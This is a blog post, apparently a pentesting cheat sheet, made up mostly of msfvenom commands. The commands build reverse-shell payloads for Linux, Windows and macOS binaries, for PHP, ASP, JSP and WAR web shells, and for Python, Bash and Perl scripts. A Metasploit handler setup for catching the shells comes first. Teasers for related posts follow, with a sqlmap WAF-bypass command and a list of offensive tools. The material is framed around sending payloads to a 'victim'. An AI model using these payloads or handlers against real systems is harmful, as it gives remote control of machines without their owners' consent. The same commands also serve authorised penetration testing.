Skip to main content

Creating Metasploit Payloads

Creating Metasploit Payloads
Metasploit - Most Used Pen Testing Tool
Usually when you use metasploit, you need to create a payload and send that payload to your victim.
Here is some useful command to create payload for many platform.
Acronym for this post:
LHOST: local host - commonly is attacker IP
LPORT: local port - default is 4444
RHOST: remote host - commonly is victim IP

[Handlers]

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z


[List payloads]

msfvenom -l

[Binaries]

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf


Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho


[Web Payloads]

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war


[Scripting Payloads]

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl


Labels:

Comments

Post a Comment

Popular posts from this blog

Advanced Sqlmap - Metasploit for SQL Injection

Advanced Sqlmap - Metasploit for SQL Injection. [?] What is SQL Injection? I'm not describe what is SQL Injection in this post, please check https://www.owasp.org/index.php/SQL_Injection [?] Why we use sqlmap? - This is a automatic SQL injection tool. - Provide many advanced technique that I'll show you in this post. - Open source and highly scalable. - Easy to install. [*] Sqlmap source https://github.com/sqlmapproject/sqlmap All you need is python 2.x and Internet connection: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev [*] Well, now I'm gonna show you some advanced technique. [Bypass WAF using sqlmap tamper script] python sqlmap.py -u 'http://example.com/product?id=1’ -p 'id' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode --timeout=25 --time-sec=25 --random-agent --dbs You can also use more tamper script but it depend on your victim DBMS. ( use too much tamper script is not RECOMMEND ) Here is ...
1 comment
Read more

Most powerful tool I usually use in pentesting

[*] Today, I'm gonna share list of tool that I usually use while pentesting. Infomation Gathering and Reconnaisance Sn1per Datasploit Discover script Recon-ng Google Hacking Maltegoce Scanning  Nmap Knockpy Dirb Dirsearch Masscan Nessus Acunetix Exploitation Metasploit Sqlmap Burp Suite TheFatRat Veil-Evasion Custom script on Internet such as Exploit-DB Maintain Access Backdoor factory Netcat Empire
Post a Comment
Read more